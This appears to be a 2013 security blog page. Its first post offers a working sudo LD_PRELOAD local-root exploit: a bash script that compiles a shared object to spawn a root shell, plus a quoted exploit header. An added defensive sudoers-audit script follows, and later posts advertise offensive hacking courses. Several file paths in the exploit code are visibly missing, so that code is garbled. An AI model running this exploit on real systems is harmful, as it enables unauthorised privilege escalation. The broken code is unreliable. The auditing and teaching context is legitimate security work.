Wed, 28 Aug 2013

Something about sudo, Kingcope and re-inventing the wheel

Willems and I are currently on an internal assessment and have popped a couple hundred (thousand?) RHEL machines, which was trivial since they are all imaged. Anyhoo - long story short, we have a user which is allowed to make use of sudo for a few commands, such as reboot and service. I immediately thought it would be nice to turn this into a local root somehow. Service seemed promising and I had a looksy at how it works. Whilst it does sanitise the library path, it does not remove LD_PRELOAD. So if we could sneak LD_PRELOAD past sudo then all should be good?

For lack of deeper understanding I googled around the issue and came across a vanilla LD_PRELOAD example overriding glibc's fopen() call. That sort of suited me well since I reckoned starting services will prolly read config files.

So after a little fiddling I came up with the following creature:

/* gcc -Wall -fPIC -shared -o myfopen.c */
/* */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* interposed fopen(): the trigger file /tmp/sandwich switches the hook on */
FILE *fopen(const char *path, const char *mode) {
    printf("MAKE ME A SANDWICH\n");
    if (access("/tmp/sandwich", F_OK) != -1)
        //printf("fake fopen: not active \n");
        return NULL;
}

which could be invoked via

touch /tmp/sandwich
sudo LD_PRELOAD=/home/george/Desktop/playground/ld_preload/ /etc/init.d/ssh restart

Best thing was it sort of worked! Ugly but functioning...
While trying to work out the finer details, however, I came across a sploit Kingcope had written in 2008 which exploited exactly this issue! Apparently older sudos did not apply "Defaults env_reset", or were configured with "Defaults setenv", which makes the LD_PRELOAD trick possible. (This still applies to [mis]configurations which preserve the environment.)
As always with Kingcope sploits it is very elegant and definitely worth a look.
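The two sudoers settings just mentioned are exactly what an administrator should be auditing for. The Python script below is an added example, not code from the original post or from Kingcope's sploit: it parses sudoers text and flags "!env_reset", "setenv", a "SETENV:" tag on a user specification, and env_keep lists that preserve loader or interpreter variables such as LD_PRELOAD. It runs against an embedded, constructed sample and never invokes sudo; the function and constant names (audit_sudoers, DANGEROUS_ENV, SAMPLE_SUDOERS) are this example's own.

```python
"""Audit sudoers text for settings that let a caller's environment reach
the privileged command. Added example; it parses text only, never runs sudo."""
import re

# Variables that change what the dynamic loader or an interpreter loads.
# If sudo preserves any of these, the caller picks code that runs as root.
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT",
                 "BASH_ENV", "ENV", "PYTHONPATH", "PERL5LIB"}

# "Defaults", optionally scoped (Defaults:user, Defaults@host, Defaults!cmd,
# Defaults>runas), followed by one or more comma-separated options.
_DEFAULTS_RE = re.compile(r"^Defaults([:@>!]\S+)?\s+(.*)$")
# One option: [!]name, optionally with =, += or -= and a (possibly quoted) value.
_OPT_RE = re.compile(r'(!?)([A-Za-z_]+)\s*(?:([+-]?=)\s*("[^"]*"|\S+))?')


def _logical_lines(text):
    """Yield (first_line_no, text) with backslash continuations joined and
    empty or comment-only lines dropped."""
    buf, start = [], None
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.rstrip()
        if start is None:
            start = n
        if line.endswith("\\"):          # continued on the next line
            buf.append(line[:-1])
            continue
        buf.append(line)
        joined = re.sub(r"\s#.*$", "", " ".join(buf)).strip()  # trailing comment
        first, buf, start = start, [], None
        if joined and not joined.startswith("#"):
            yield first, joined


def audit_sudoers(text):
    """Return a list of (line_no, message) for entries that weaken sudo's
    environment sanitisation."""
    findings = []
    for n, line in _logical_lines(text):
        # SETENV: tag on a user spec lets that user pass VAR=value to sudo
        if re.search(r"(?<!NO)SETENV:", line):
            findings.append((n, "SETENV tag: caller may set VAR=value on the sudo command line"))
            continue
        m = _DEFAULTS_RE.match(line)
        if not m:
            continue
        scope = m.group(1) or ""
        for neg, name, op, value in _OPT_RE.findall(m.group(2)):
            if name == "env_reset" and neg == "!":
                findings.append((n, f"Defaults{scope} !env_reset: environment is not reset to the minimal set"))
            elif name == "setenv" and neg != "!":
                findings.append((n, f"Defaults{scope} setenv: caller may set VAR=value on the sudo command line"))
            elif name == "env_keep" and op in ("=", "+="):
                kept = sorted(set(value.strip('"').split()) & DANGEROUS_ENV)
                if kept:
                    findings.append((n, f"Defaults{scope} env_keep preserves {' '.join(kept)}"))
    return findings


# Constructed sample, not taken from any real host.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults    env_reset
Defaults    secure_path="/usr/sbin:/usr/bin:/sbin:/bin"
Defaults:george  setenv
Defaults    env_keep += "LANG LC_ALL"
Defaults    env_keep += "LD_PRELOAD \\
                         LD_LIBRARY_PATH"
root    ALL=(ALL) ALL
george  ALL=(root) NOPASSWD: /sbin/service, /sbin/reboot
ops     ALL=(root) SETENV: /usr/bin/systemctl
"""

if __name__ == "__main__":
    import sys
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SUDOERS
    for n, msg in audit_sudoers(src):
        print(f"line {n}: {msg}")
```

Run it with a file path to check a real sudoers (files pulled in via #includedir need the same treatment), and compare against `sudo -V` run as root, which lists the settings actually in effect for that build, including whether env_reset is on.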

On a side note: the header of his sploit says:

#* Sudo <= 1.6.9p18 local r00t exploit
#* by Kingcope/2008/
# Most lame exploit EVER!
# Needs a special configuration in the sudoers file:
# --->>>>> "Defaults setenv" so environ vars are preserved :) <<<<<---
# May also need the current users password to be typed in
# So this exploit is UBERLAME!
# First Argument to this shell file: A program your current
# user is allowed to execute via sudo. sudo has to be in
# the path!!
# successfully tested on FreeBSD-7.0 and RedHat Linux
# I don't even know why I realease such stuffz

so Kingcope considered the vuln UEBERLAME... I don't know whether I should be proud or sad for having found it five years later then.
Anyhoo, at this point I was already pretty invested in the thing and decided to see the re-invention of the wheel through. Kingcope's shared object was a lot slicker than mine, hooking into _init() rather than fopen(), which makes it a lot more generic and elegant. He used unsetenv("LD_PRELOAD") so that the payload executes only once, which is also a lot more elegant.

So I shamelessly stole from his sploit... I don't see the need for a suid shell stager and fancy execl()s when a simple system() does the job, but I am prolly missing several points =) So without further waffle here it is. It's called the sandwich sploit as a homage to the classic XKCD sudo comic.

#!/bin/bash
#
# old/misconfigured sudo local root
#
# disclosed by Kingcope in 2008
#
#
# "re-discovered" in 2013 by
#
#
echo
echo "[!] $0 - sudo un-sanitised environment sploit"
echo "[!] usage: $0 <program to run via sudo> "
echo
cat > /tmp/sandwich.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
void _init()
{
    if (!geteuid())
    {
        unsetenv("LD_PRELOAD");
        setgid(0);
        setuid(0);
        unlink("/tmp/");
        unlink("/tmp/sandwich.c");
        system("/bin/bash");
    }
}
_EOF
gcc -fPIC -shared -o /tmp/ /tmp/sandwich.c -nostartfiles
sudo LD_PRELOAD=/tmp/ $1

Wed, 12 Jun 2013

Black Hat Vegas 2013 - Course Summaries

We have an updated breakdown of our BlackHat courses here

With the 'early registration' discount period coming to an end on May 31, I wanted to provide an overview of what courses we're offering and how those courses fit together.

Please be sure to take advantage of these discounted prices whilst they're still available. This summary will help you decide which course is best for you...

1. "Cadet" is our intro course. It provides the theoretical and practical base required to get the most out of our other courses. Don't let the introductory title put you off: this course sets the stage for the rest of the series, and fills in many blanks people might have when performing offensive security assessments. We only offer it on the weekend (27th & 28th) but it's really popular so we've opened a 2nd classroom. Plenty of space available, so sign up!

2. "Bootcamp" is our novice course. It's a legendary program that we've offered successfully for almost 10 years now. The course is modified and updated each year to reflect new thinking, paradigms and attack vectors, but its real beauty is in the fundamental and unchanging principles and thinking skills it presents. We've opened up additional classrooms here too, so we can accommodate plenty of people.

3. Our "Unplugged" course is an entry-level wireless security training course. It is done in the same style as our other HBN courses: highly practical, with a focus on learning how things work, not just the tricks. Last year "Unplugged" sold out quickly, but this year we have additional space. Please sign up before it fills up.

4. "BlackOps" is a student's final course in the Hacking By Numbers series before being deployed into "Combat." In BlackOps, students will sharpen their skills in real-world scenarios before being shipped off to battle. BlackOps covers tools and techniques to brush up your skills on data exfiltration, privilege escalation, pivoting, client-side attacks and harnessing OSINT. Students will also focus on practical elements of attacking commonly found systems and staying under the radar. BlackOps also sold really well last year, and we can't open additional classrooms, so please sign up early.

5. "Mobile" is our very first Mobile Hacking course, and the first of its kind for beginners in this field. As mobile phone usage continues to grow at an outstanding rate, this course shows you how you would go about testing the mobile platforms and installed applications. "Mobile" will give you a complete and practical window into the methods used when attacking mobile platforms. This course is ideal for penetration testers who are new to the mobile area. Our enrolments have just reached double-figures and seats are limited, so please sign up early.

If you need help selecting the right course, or getting registered, please contact us via training[at]sensepost[dot]com.

About 50 people have already signed up. Register now to benefit from the early-registration discounts and join us in Vegas in July!

Fri, 31 May 2013

BlackOps Hacking Training - Las Vegas

Get some.

BlackOps you say?
At SensePost we have quite a range of courses in our Hacking by Numbers series. We feel each one has its own special place. I've delivered almost all the courses over the years, but my somewhat biased favourite is our relatively new BlackOps Edition. Myself (Glenn) and Vlad will be presenting this course at BlackHat Vegas in July.

Where Does BlackOps fit in?
Our introductory courses (Cadet and Bootcamp) are meant to establish the hacker mindset - they introduce the student to psychological aspects of an attacker, and build on that to demonstrate real world capability. BlackOps is designed for students who understand the basics of hacking (either from attending Bootcamp/Cadet, or from other experience) and want to acquire deeper knowledge of techniques. We built the course based on our 12 years of experience of performing security assessments.

But really, what's the course about?
This course is aimed at those who've been penetration testing for a while, but still feel a bit lost when they've compromised a host, or network and want to know the best possible approach to take for the next step. All of the labs in this course come from real life assessments, with the final lab being a full-blown social engineering attack against an admin with pivoting, exfiltration and the works. Specifically, we're going to cover the following topics:

1. Introduction to Scripting
A hacker who can automate a task is an efficient and effective attacker.

2. Advanced Targeting
A hacker who can quickly and effectively identify targets is a successful attacker. We'll be looking at non-standard techniques for identifying targets, such as mDNS, IPv6, and even Pastebin.

3. Compromise
You may know how to roll a generic Metasploit payload, but we'll be looking at some lesser-utilised approaches to compromise: from WPAD injection, to rogue routers in IPv6, to good old smbrelay attacks.

4. Privilege Escalation
Following on naturally from compromise: how do you elevate your privileges after compromising a box? Everyone wants to be root or enterprise admin.

5. Pivoting
Once you've compromised a lowly developer's test server on the edge of the network, or the receptionist PC, how do you bounce through that box to get to the good stuff, three DMZs deep? We'll show you how.

6. Exfiltration
A good hacker knows that finding the jewels is only half the battle - smuggling them out can be just as hard. We'll look at how we can use non-standard communication channels to exfiltrate data out of a compromised network. Company X has just deployed a really expensive DLP solution, but you really need to get this data out, how do you bypass it?

7. Client Side Attacks
The weakest layer of the OSI stack: the human. Made über popular over the past 18 months, this is Unit 61398 in action.

8. Camouflage (new for Vegas 2013!)

During the infiltration phase of any attack, a hacker will ultimately need to try and execute code on the target system - whether achieved by means of phishing, payload delivery through an exploit or social engineering - running the code on the target system is the ultimate goal of most cyber attacks in the wild. What this means is that an attacker will need to be capable of bypassing any host-based protection software deployed on the target system for successful exploitation.
This module will run you through the techniques, methods and software currently used by those targeting large corporates to achieve AV immunity under any circumstances.

Each of the above modules is followed by a practical lab to allow you to practise your newly acquired skills. The course finishes with a Capture-the-Flag, with a grand prize. Honestly, this final lab is enjoyable and guaranteed to bring a smile to your face.

We're looking forward to sharing our knowledge, experience, and passion for security with you. Please sign up here.

-Glenn & Vlad

Thu, 23 May 2013

Stay low, move fast, shoot first, die last, one shot, one kill, no luck, pure skill ...

We're excited to be presenting our Hacking By Numbers Combat course again at Black Hat USA this year. SensePost's resident German haxor dude Georg-Christian Pranschke will be presenting this year's course. Combat fits in right at the top of our course offerings. No messing about, this really is the course where your sole aim is to pwn as much of the infrastructure and applications as possible. It is for the security professional looking to hone their skill-set, or to think like those in Unit 61398. There are a few assumptions though:

  • you have an excellent grounding in infrastructure and application assessments

  • you aren't scared of tackling systems that aren't easily owned using Metasploit

  • gaining root is an almost OCD-like obsession

  • there are no basic introductions to Linux, shells, pivoting etc.

As we've always said, it is quite literally an all-hack, no-talk course. We are not going to dictate what tools or technologies get used by students. We don't care if you use Ruby or Perl or Python to break something (we do, actually - we don't like Ruby), just as long as it gets broken. The Combat course itself is a series of between 12 and 15 (depending on time) capture-the-flag type exercises presented over a period of two days. The exercises include infrastructure, reverse engineering and crypto.

These targets come from real-life assessments we've faced at SensePost; it's about as real as you can get without having to write the report at the end of it. How it works is that candidates are presented with a specific goal. If the presenter is feeling generous at the time, they may even get a description of the technology. After that, they'll have time to solve the puzzle. Afterwards, there will be a discussion about the failings, takeaways and alternate approaches adopted by the class. The latter is normally fascinating as, as anybody in the industry knows, there is a virtually limitless number of ways to solve a specific problem. This means that even the instructor gets to learn a couple of new tricks (we also have prizes for those who teach them enough new tricks).

In 2012, Combat underwent a massive rework and we presented a virtually new course which went down excellently. We're aiming to do the same this year, and to make it the best Combat course ever. So if you're interested in spending two days' worth of intense thinking solving some fairly unique puzzles and shelling boxen, join us for HBN Combat at BlackHat USA.

Mon, 20 May 2013

Your first mobile assessment

Monday morning, raring for a week of pwnage and you see you've just been handed a new assessment, awesome. The problem? It's a mobile assessment and you've never done one before. What do you do, approach your team leader and ask for another assessment? He's going to tell you to learn how to do a mobile assessment and do it quickly, there are plenty more to come.

Now you set out on your journey into mobile assessments and you get lucky: the application that needs to be assessed is an Android app. A few Google searches later and you are feeling pretty confident about this. Android assessments are meant to be easy; there are even a few tools out there that "do it all". You download the latest and greatest version, run it, and the app gets a clean bill of health. After all, the tool says so: there is no attack surface, no exposed intents, and the permissions all check out. You compile your report, hand it off to the client, and a week later the client gets owned through the application... Apparently the backend servers were accepting application input without performing any authentication checks. Furthermore, all user input was trusted and no server-side validation was being performed. What went wrong? How did you miss these basic mistakes? After all, you followed all the steps, you ran the best tools and you ticked all the boxes. Unfortunately this approach is wrong: mobile assessments are not always simply about running a tool. A lot of the time they require the same steps used to test web applications, just applied in a different manner. This is where SensePost's Hacking by numbers: Mobile comes to the fore; the course aims to introduce you to mobile testing from the ground up.

The course offers hands-on training, introducing techniques for assessing applications on Android, iOS, RIM and Windows 8. Some of the areas covered include:

  • Communication protocols

  • Programming languages for mobile development

  • Building your own mobile penetration testing lab

  • Mobile application analysis

  • Static Analysis

  • Authentication and authorization

  • Data validation

  • Session management

  • Transport layer security and information disclosure

Unlike other mobile training or tutorials that focus on a specific platform or a specific tool on that platform, Hacking by Numbers aims to give you the knowledge to perform assessments on any platform with a well-established methodology. Building on everything taught in the Hacking by Numbers series, the mobile course aims to move assessments into the mobile sphere, continuing the strong tradition of pwnage. The labs are a direct result of the assessments we've done for clients. Our trainers do this on a weekly basis, so you get the knowledge learned from assessing numerous apps over the last few years.

On your next mobile assessment you'll be able to do both static and dynamic analysis of mobile applications. You will know where to find those credit card numbers stored on the phone and how to intercept traffic between the application and the backend servers.

The course: Hacking by numbers: Mobile